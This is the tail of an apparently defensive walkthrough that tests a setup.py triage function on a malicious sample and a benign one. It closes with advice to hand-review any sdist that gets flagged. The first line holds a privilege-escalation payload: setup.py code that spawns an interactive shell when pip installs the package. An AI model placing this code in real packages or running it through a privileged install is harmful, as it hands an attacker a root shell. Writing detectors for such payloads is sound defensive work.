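PIP_PRIVESC_SETUP = "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\n"
# A setup.py that only describes the package.
BENIGN_SETUP = "import setuptools\nsetuptools.setup(name='example-pkg', version='0.0.1')\n"

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, triage_setup_py(src))
```

Run it over every sdist before it reaches a private index, and treat any finding as a reason to read the file by hand rather than as proof of intent.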

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
